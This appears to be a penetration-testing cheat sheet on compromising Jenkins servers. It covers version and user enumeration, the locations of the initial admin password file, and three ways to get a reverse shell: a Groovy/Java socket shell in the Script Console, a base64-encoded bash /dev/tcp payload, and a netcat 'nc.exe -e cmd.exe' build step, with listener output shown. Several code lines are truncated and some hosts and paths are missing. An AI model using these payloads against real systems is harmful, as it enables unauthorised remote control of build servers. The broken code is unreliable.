

Jenkins is a free and open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat.


We can obtain a some valuable information without necessarily log in on the server.

Jenkins Version

Visit the following route to obtain the Jenkins version on the footer page.


Page generated: Sep 27, 2021 12:46:28 PM PDTREST APIJenkins ver. 2.204.1


Without credentials it is possible to obtain some users.



There are no default credentials but some times these works.


In new versions the password is randomized at installation. We can find the initial password here:

  • Linux

  • Windows

C:\Program Files (x86)\Jenkins\secrets\initialAdminPassword
C:\Program Files\Jenkins\secrets\initialAdminPassword

From Admin to Reverse Shell

There are multiple ways in which from administrative privileges in Jenkins you can get a reverse shell.

Script Console

To obtain a Reverse shell we need to execute Manage Jenkins on Script Console.

Windows Reverse Shell

String host="<IP-ADDR>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Linux Reverse Shell

First we need to craft the payload.

$ echo "bash -c 'bash -i >& /dev/tcp/ 0>&1'" | base64

And introduce inside the Grovvy script.

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDMgMD4mMScK}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
println "out> $sout err> $serr"

Freestyle Project

Go on New Item tab.

Introduce a name such as Access and select Freestyle Project .

Scroll down until you find the Build section and add a Execute Windows batch command as build step.

Introduce the reverse shell on the Command window and click Save.

\\\share\nc.exe -e cmd.exe

Go to Build Now section.

When the build is executed a new item will be displayed under the Build History.

At that moment a reverse shell is obtained.

$ sudo nc -lvp 443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 26524
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


We can also check the console output selecting the Built Item #1 and going to Console Output section.

Last updated